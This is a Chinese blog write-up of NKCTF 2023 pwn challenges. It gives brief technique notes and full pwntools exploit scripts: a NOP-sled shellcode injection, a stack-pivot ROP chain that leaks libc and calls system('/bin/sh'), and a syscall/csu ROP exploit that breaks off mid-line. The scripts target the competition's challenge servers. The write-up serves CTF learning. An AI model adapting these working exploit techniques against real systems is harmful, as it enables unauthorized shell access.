NKCTF PWN wp

ShouCheng3

已于 2023-03-30 11:20:03 修改

阅读量525

点赞数

分类专栏： WP 文章标签： linux ubuntu 安全

于 2023-03-30 10:17:50 首次发布

本文链接：https://blog.csdn.net/qq_51232724/article/details/129852012

版权

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档

文章目录

ezshellcode
a_story_of_a_pwner
ez_stack
baby_rop
baby_heap
only_read
ByteDance
9961code

ezshellcode

填充nop抵消随机滑行到shellcode

#!usr/bin/env python 
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
DEBUG = 1
if DEBUG:
    gdbOpen = 1
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    p = process('./pwn')
else:
    gdbOpen = 0
    ip = 'node.yuzhian.com.cn'
    port = 38867
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    if gdbOpen == 1:
        gdb.attach(p, info)
        #gdb.attach(p, "b *$rebase(0x)")


debug("b *0x00000000004012F1")
shellcode = p8(0x90) * 104 + asm(shellcraft.sh()) 
p.sendafter("in 5 min!\n", shellcode)

p.interactive()

a_story_of_a_pwner

栈迁移然后刚好够弹一个参数执行system

#!usr/bin/env python 
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./pwn')
DEBUG = 0
if DEBUG:
    gdbOpen = 1
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    libc = ELF("./libc.so.6")
    p = process('./pwn')
else:
    gdbOpen = 0
    ip = 'node2.yuzhian.com.cn'
    port = 33627 
    libc = ELF("./libc.so.6")
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    if gdbOpen == 1:
        gdb.attach(p, info)
        #gdb.attach(p, "b *$rebase(0x)")


def choose(choice):
    p.sendlineafter(b"> \n", str(choice).encode('ascii'))

pop_rdi = 0x0000000000401573
leave_ret = 0x000000000040139E
debug("b *0x000000000040139F")
choose(4)
p.recvuntil(b'0x')
leak = int(p.recv(12), 16) - 0x84420
log.info("libc_base==>0x%x" %leak)
sys = leak + libc.sym['system']
binsh = leak + next(libc.search(b'/bin/sh'))
choose(1)
p.sendafter(b'comment?\n', p64(binsh))
choose(2)
p.sendafter(b'corment?\n', p64(pop_rdi))
choose(3)
p.sendafter(b'corMenT?\n', p64(sys))
choose(4)
payload = b'a'*0xa + p64(0x0000000000405098) + p64(leave_ret)
p.sendafter(b'heart...\n', payload)

p.interactive()

ez_stack

程序内直接就能找到syscall的gadget，使用其即可，注意的地方就是csu调用的时候是个指针，所以要把这个地址写入bss上才能正常使用

#!usr/bin/env python 
#coding=utf-8
from pwn import *
from ctypes import CDLL
context(arch = 'amd64',os = 'linux',log_level = 'debug')
elf = ELF('./ez_stack')
DEBUG = 0
if DEBUG:
    gdbOpen = 1
    libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
    ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so")
    p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    #p = process('./ez_stack')
else:
    gdbOpen = 0
    ip = 'node2.yuzhian.com.cn'
    port = 35211 
    p = remote(ip, port)
    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    
def debug(info="b main"):
    if gdbOpen == 1:
        gdb.attach(p, info)
        #gdb.attach(p, "b *$rebase(0x)")

pop_rdi = 0x0000000000401283
pop_rsi = 0x0000000000401281 # pop rsi ; pop r15 ; ret
syscall = 0x000000000040114e
csu1 = 0x000000000040127A
csu2 = 0x0000000000401260

debug("b *0x00000000004011F6")
payload = b'a'*0x18 &#